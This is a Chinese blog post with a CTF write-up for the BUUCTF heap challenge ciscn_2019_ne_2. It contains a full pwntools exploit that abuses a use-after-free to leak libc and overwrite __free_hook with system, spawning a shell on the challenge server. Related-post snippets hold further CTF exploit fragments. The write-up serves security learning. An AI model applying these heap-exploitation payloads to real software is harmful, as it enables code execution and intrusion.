[BUUCTF-pwn] ciscn_2019_ne_2

最新推荐文章于 2024-07-25 11:55:14 发布
最新推荐文章于 2024-07-25 11:55:14 发布
阅读量534 收藏
点赞数
分类专栏: CTF pwn 文章标签: ci
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121127918
版权

自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个

概况:

  1. c++写的程序,反汇编后一个字符串有1米长
  2. 冒: 6个字符依次或或6-1得到 H@QRPN
  3. free未清指针

步骤:

  1. 输入"NEUQRO" 开始
  2. 建80,70,10(/bin/sh\x00)
  3. free90 八次 70两次 show 0得到libc
  4. 建70 三次,依次写free_hook,x,system
  5. free 1
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
    p = remote('node4.buuoj.cn', 25510) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps

#  [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")  

menu = b'> \n'
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'input the size \n', str(size).encode()) #<=0x100
    p.sendlineafter(b"now you can input something...\n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'input the index\n', str(idx).encode()) # UAF

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'input the index\n', str(idx).encode()) 

add(0x80, b'A')
add(0x10, b'/bin/sh\x00')
add(0x70, b'A')
[free(2) for _ in range(2)]
[free(0) for _ in range(8)]
show(0)
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False).ljust(8, b'\x00')) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system    = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))

context.log_level = 'debug'
add(0x70, p64(free_hook))
#gdb.attach(p)
#pause()
add(0x70, b'A')
add(0x70, p64(system))
free(1)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
ciscn_2019_en_2
m0sway的博客
03-25 1666
ciscn_2019_en_2 WriteUp BUU_PWN
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1069
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF - PWNciscn_2019_en_2
古月浪子的博客
03-25 1215
不知道是不是题目重复了,反正我的另一篇博文的exp可以直接copy过来打通… 传送门:【BUUCTF - PWNciscn_2019_c_1 附件:ciscn_2019_en_2
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2360
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 419
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4129
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2651
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
[BUUCTF-pwn] ciscn_2019_nw_2
weixin_52640415的博客
10-28 289
[BUUCTF-pwn]— ciscn_2019_nw_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_nw_2 checksec看保护-全开(堆题都一样可以不看) 菜单:只有add和free 且free未删指针有明显的UAF,而且是ubuntu18对应的libc-2.27版本可以直接free*2 free限制了次数3 add分两部分一个8字节一个68,这样可以独立修改fp的一部分 网上没搜到exp #先获取libc 只能free 3次,且块大小固定为0x7
ciscn_2019_en_2 ret2libc64
pondzhang的专栏
05-02 317
from pwn import * elf = ELF('./libc-2.23.so') p = process("./ciscn_2019_en_2") p.recvuntil('choice!\n') p.sendline("1") p.recvuntil('encrypted\n') poprdiret = 0x0000000000400c83 pltputs = 0x0000000000...
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 729
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
pwnciscn_2019_es_2
Nothing
12-24 2826
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn_2019_n_4
doudoudedi
02-03 2001
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 884
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1037
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
ciscn_2019_n_1
weixin_44110537的博客
08-26 541
栈溢出覆盖掉v2为11.28125的存储形式从而打开后门. from pwn import * p=remote('xxxxxxxxxx',xxxxx) payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000) p.recvuntil('Let\'s guess the number.') p.sendline(payload) p.interactive() ...
物理机 gogs+jenkins+sonarqube 实现CI/CD
最新发布
Richardlygo的博客
07-25 2230
其中ref就是推送过去的分支啦。以下的推送的内容都是可以通过文章后面设置jenkins变量来获得的。历史版本下载地址:  http://www.oracle.com/technetwork/java/javase/archive-139210.html。当前最新版本下载地址:http://www.oracle.com/technetwork/java/javase/downloads/index.html。上述方法之所以安装不成功,主要是golang版本和golangci-lint版本不一致导致导致的;
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值